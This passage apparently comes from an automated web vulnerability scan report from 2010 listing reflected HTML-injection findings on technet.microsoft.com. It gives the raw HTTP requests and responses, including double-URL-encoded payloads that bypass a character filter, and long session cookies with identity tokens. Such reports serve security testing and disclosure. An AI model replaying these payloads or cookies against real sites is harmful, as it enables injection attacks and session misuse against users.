Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us75281%2522%253e%253ca%253ebc4fa03f4e7/library/aa991542.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us75281"><a>bc4fa03f4e7/library/aa991542" />
...[SNIP]...

2.155. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf0f%2522%253e%253ca%253e84fddc32f18 was submitted in the REST URL parameter 2. This input was echoed as 9bf0f"><a>84fddc32f18 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9bf0f%2522%253e%253ca%253e84fddc32f18/aa991542.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9bf0f"><a>84fddc32f18/aa991542" />
...[SNIP]...

2.156. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6463%2522%253e%253ca%253efc79662f9f2 was submitted in the REST URL parameter 3. This input was echoed as e6463"><a>fc79662f9f2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa991542.aspxe6463%2522%253e%253ca%253efc79662f9f2 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa991542.aspxe6463"><a>fc79662f9f2" />
...[SNIP]...

2.157. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46021%2522%253e%253ca%253eead3e3d9a48 was submitted in the REST URL parameter 1. This input was echoed as 46021"><a>ead3e3d9a48 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us46021%2522%253e%253ca%253eead3e3d9a48/library/bb625087.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46021"><a>ead3e3d9a48/library/bb625087" />
...[SNIP]...

2.158. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b7ce%2522%253e%253ca%253e513411c4713 was submitted in the REST URL parameter 2. This input was echoed as 7b7ce"><a>513411c4713 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library7b7ce%2522%253e%253ca%253e513411c4713/bb625087.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library7b7ce"><a>513411c4713/bb625087" />
...[SNIP]...

2.159. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da43a%2522%253e%253ca%253ef735b7a07d3 was submitted in the REST URL parameter 3. This input was echoed as da43a"><a>f735b7a07d3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb625087.aspxda43a%2522%253e%253ca%253ef735b7a07d3 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 